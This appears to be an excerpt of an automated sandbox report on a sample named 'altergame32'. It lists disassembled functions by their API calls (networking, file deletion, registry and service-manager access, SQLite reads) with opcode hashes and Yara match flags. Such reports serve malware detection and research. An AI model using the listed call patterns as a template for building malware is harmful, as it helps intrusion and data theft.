                                                                  • API String ID: 2507506473-0
                                                                  • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                  • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                                  • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                  • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                                  • Instruction ID: 111d6632d5b9c242e9fc9679db8046095268ab7c5413e818d62677c6d9c37380
                                                                  • Opcode Fuzzy Hash: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                                  • Instruction Fuzzy Hash: 9411E7719046019BEB188F64DA99B7B3BA0AF04314F14413BF907AE2C1C779CA86DB4A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                                  • Instruction ID: 9e2917bad73b05df65526e13dc98655dc28116d46e1899a2a9a3aae13cf9c72c
                                                                  • Opcode Fuzzy Hash: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                                  • Instruction Fuzzy Hash: B6019B71A046119BDB188F64DE99B7A3BA0AF04314F14453BF507EE2D0C779C985DB49
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4511E
                                                                    • Part of subcall function 02E43D7E: htons.WS2_32(?), ref: 02E43DA2
                                                                    • Part of subcall function 02E43D7E: htonl.WS2_32(00000000), ref: 02E43DB9
                                                                    • Part of subcall function 02E43D7E: htonl.WS2_32(00000000), ref: 02E43DC0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$H_prologhtons
                                                                  • String ID:
                                                                  • API String ID: 4039807196-0
                                                                  • Opcode ID: 2e09034d8719b4f6dce5a19d7770802977255da8bcf2b3ef66e4ddc0de95370e
                                                                  • Instruction ID: 4ecb66520e8f040e8d4b5e2ef508e5adda9abb8a8e9a06650a063ee6fc14c920
                                                                  • Opcode Fuzzy Hash: 2e09034d8719b4f6dce5a19d7770802977255da8bcf2b3ef66e4ddc0de95370e
                                                                  • Instruction Fuzzy Hash: D8814872D8424ECFCF15DFA8E090AEEBBB5AF48214F14916AE850B7240EB755A05CF64
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(5193289A,?,?,?), ref: 02ED30F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E7A000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e7a000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                                  • Instruction ID: 0b23120f8d352db3ef11cf7f362516cd92965ae63f730a9c92f0900960a03ac3
                                                                  • Opcode Fuzzy Hash: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                                  • Instruction Fuzzy Hash: 25518CF250C200AFE705AF19DC8577ABBE5EFC8720F06892DE6C583644DA359851CB93
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E9C5
                                                                    • Part of subcall function 02E41A01: TlsGetValue.KERNEL32 ref: 02E41A0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prologValue
                                                                  • String ID:
                                                                  • API String ID: 3700342317-0
                                                                  • Opcode ID: 1ddaec3a645ff924805f38c462467a57b611f1e12e8107a3cdbcbea68bb7b2c6
                                                                  • Instruction ID: a6ff3c2bddca505efa59f41d4746dedd9d663357a4932843fe51a715c5dee66d
                                                                  • Opcode Fuzzy Hash: 1ddaec3a645ff924805f38c462467a57b611f1e12e8107a3cdbcbea68bb7b2c6
                                                                  • Instruction Fuzzy Hash: 4E2151B1944209AFDF00DF95E440AFEBBF9FF48314F14905EE904A7240DB70AA04DBA1
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02E433CC
                                                                    • Part of subcall function 02E432AB: __EH_prolog.LIBCMT ref: 02E432B0
                                                                    • Part of subcall function 02E432AB: RtlEnterCriticalSection.NTDLL(?), ref: 02E432C3
                                                                    • Part of subcall function 02E432AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E432EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                  • String ID:
                                                                  • API String ID: 1518410164-0
                                                                  • Opcode ID: a4af0ff6fad89dcf47329c35108f14d2b4edff424fa5e900a9e6c358125affa2
                                                                  • Instruction ID: b705f3e765df5185e820b6a9570f4a409e6d68e5e29aca65902679d4c330d7ce
                                                                  • Opcode Fuzzy Hash: a4af0ff6fad89dcf47329c35108f14d2b4edff424fa5e900a9e6c358125affa2
                                                                  • Instruction Fuzzy Hash: 93014071654606AFDB04DF59E885F55BBA9FF45324B20C35AE928872C0EF70EC21CBA4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E555
                                                                    • Part of subcall function 02E426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02E42706
                                                                    • Part of subcall function 02E426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E4272B
                                                                    • Part of subcall function 02E426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E65B53), ref: 02E42738
                                                                    • Part of subcall function 02E426DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02E42778
                                                                    • Part of subcall function 02E426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E427D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                  • String ID:
                                                                  • API String ID: 4293676635-0
                                                                  • Opcode ID: 79d52e2c4da552d2142098393e8d572a3f7f4e8e5c27b4872d5a6e1e1d14aea6
                                                                  • Instruction ID: c38155c0bea1a3361e868da9338a9eb55fa62b023b9e789ed4f97c30e56c3ab7
                                                                  • Opcode Fuzzy Hash: 79d52e2c4da552d2142098393e8d572a3f7f4e8e5c27b4872d5a6e1e1d14aea6
                                                                  • Instruction Fuzzy Hash: 5B01D0B0A90B048FC718CF0AC54899AFBF4EF88700B05C5AE94498B321E770AA40CF90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                                  • Instruction ID: 9af1d715428bb10e0452cb367a8199cfa5a1ac560f54e1c53b8f875cbd80c69b
                                                                  • Opcode Fuzzy Hash: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                                  • Instruction Fuzzy Hash: 08F0F676D25256CDC3149BB86F112E57BF0A646B20754033BD893B20E2C7344949EB1E
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                                  • Instruction ID: f8c3724f754cfcc94ef41bc6c10cfa097af13215f723e54c64c92e4290f33e94
                                                                  • Opcode Fuzzy Hash: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                                  • Instruction Fuzzy Hash: F4F02E31E04616CBE7108FA1D9841A9F723BB5130476046BFD851A3284E339944EDB48
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                                  • Instruction ID: 24ab9ea8706f183bf36089ca0671f6bd679c7bc8bd1ec4c941c05a3988f0b299
                                                                  • Opcode Fuzzy Hash: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                                  • Instruction Fuzzy Hash: F3F0A938A04203CFDB00CE99D9C0BA633E0BB58780B50406ADC02EB388D378D5028E99
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 1889721586-0
                                                                  • Opcode ID: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                                  • Instruction ID: bcc538560c25e25718ea8e5d329da63500f38517310f8df8015202c046b36953
                                                                  • Opcode Fuzzy Hash: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                                  • Instruction Fuzzy Hash: 33E0DF308061528AD3084FA06BA00603B60E909721310047FC083B54F2D63C4A46EB2A
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E334
                                                                    • Part of subcall function 02E53B4C: _malloc.LIBCMT ref: 02E53B64
                                                                    • Part of subcall function 02E4E550: __EH_prolog.LIBCMT ref: 02E4E555
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prolog$_malloc
                                                                  • String ID:
                                                                  • API String ID: 4254904621-0
                                                                  • Opcode ID: 379fab7afca3416c06a8651ffa92af2982ddf3d22465154f5ba2be20cafbd564
                                                                  • Instruction ID: ab2b7f4b5d730f3a2a0d6bf643a55856edb3fbe60cfea4d53f0d607e5be0d093
                                                                  • Opcode Fuzzy Hash: 379fab7afca3416c06a8651ffa92af2982ddf3d22465154f5ba2be20cafbd564
                                                                  • Instruction Fuzzy Hash: 2CE0C271AD0205ABCF0DEF68E81173EB7A6EB04744F04D5ADB809D2340EF7089008B44
                                                                  APIs
                                                                    • Part of subcall function 02E55C5A: __getptd_noexit.LIBCMT ref: 02E55C5B
                                                                    • Part of subcall function 02E55C5A: __amsg_exit.LIBCMT ref: 02E55C68
                                                                    • Part of subcall function 02E53493: __getptd_noexit.LIBCMT ref: 02E53497
                                                                    • Part of subcall function 02E53493: __freeptd.LIBCMT ref: 02E534B1
                                                                    • Part of subcall function 02E53493: RtlExitUserThread.NTDLL(?,00000000,?,02E53473,00000000), ref: 02E534BA
                                                                  • __XcptFilter.LIBCMT ref: 02E5347F
                                                                    • Part of subcall function 02E58D94: __getptd_noexit.LIBCMT ref: 02E58D98
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                  • String ID:
                                                                  • API String ID: 1405322794-0
                                                                  • Opcode ID: be4c7acc83ee84a92e92717ee1f3401ea792331664997956a3b05afe9298d8e6
                                                                  • Instruction ID: 93a8d1cb4e2f04bca63dee6452d15d3af62e60f1bd6892304c078fdd33e8ac62
                                                                  • Opcode Fuzzy Hash: be4c7acc83ee84a92e92717ee1f3401ea792331664997956a3b05afe9298d8e6
                                                                  • Instruction Fuzzy Hash: 51E0ECB59906109FEB08EBE0D849F6D77AAAF05701F209098F502AB261DA74A940DF20
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory
                                                                  • String ID:
                                                                  • API String ID: 4241100979-0
                                                                  APIs
                                                                    • Part of subcall function 02E51610: OpenEventA.KERNEL32(00100002,00000000,00000000,F6639BC4), ref: 02E516B0
                                                                    • Part of subcall function 02E51610: CloseHandle.KERNEL32(00000000), ref: 02E516C5
                                                                    • Part of subcall function 02E51610: ResetEvent.KERNEL32(00000000,F6639BC4), ref: 02E516CF
                                                                    • Part of subcall function 02E51610: CloseHandle.KERNEL32(00000000,F6639BC4), ref: 02E51704
                                                                  • TlsSetValue.KERNEL32(00000028,?), ref: 02E521AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandle$OpenResetValue
                                                                  • String ID:
                                                                  • API String ID: 1556185888-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000), ref: 0040D404
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 1586166983-0
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                    • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_step.SQLITE3 ref: 6096755A
                                                                  • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                  • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                  • sqlite3_step.SQLITE3 ref: 609679C3
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                  • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                  • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                  • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                  • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                  • sqlite3_step.SQLITE3 ref: 60967B94
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                  • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                  • memcmp.MSVCRT ref: 60967D4C
                                                                  • sqlite3_free.SQLITE3 ref: 60967D69
                                                                  • sqlite3_free.SQLITE3 ref: 60967D74
                                                                  • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                  • sqlite3_free.SQLITE3 ref: 60968002
                                                                    • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                    • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                    • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                    • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                    • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                  • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                  • sqlite3_reset.SQLITE3 ref: 60968035
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                  • sqlite3_step.SQLITE3 ref: 609680D1
                                                                  • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                  • sqlite3_reset.SQLITE3 ref: 60968104
                                                                  • sqlite3_step.SQLITE3 ref: 60968139
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                  • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                    • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                  • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                    • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                    • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                    • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                  • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                  • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                  • sqlite3_step.SQLITE3 ref: 6096764C
                                                                  • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                  • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                  • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                    • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                  • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                  • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                  • sqlite3_step.SQLITE3 ref: 609690E6
                                                                  • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                  • sqlite3_free.SQLITE3 ref: 60969102
                                                                  • sqlite3_free.SQLITE3 ref: 6096910D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                  • String ID: $d
                                                                  • API String ID: 2451604321-2084297493
                                                                  APIs
                                                                  • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                  • sqlite3_free.SQLITE3 ref: 60966183
                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                  • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                  • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                  • memcmp.MSVCRT ref: 6096639E
                                                                    • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                    • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                    • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                    • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                  • String ID: ASC$DESC$x
                                                                  • API String ID: 4082667235-1162196452
                                                                  APIs
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                  • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                  • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                    • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                    • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                    • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                    • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                  • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                  • sqlite3_malloc.SQLITE3(?), ref: 60969561
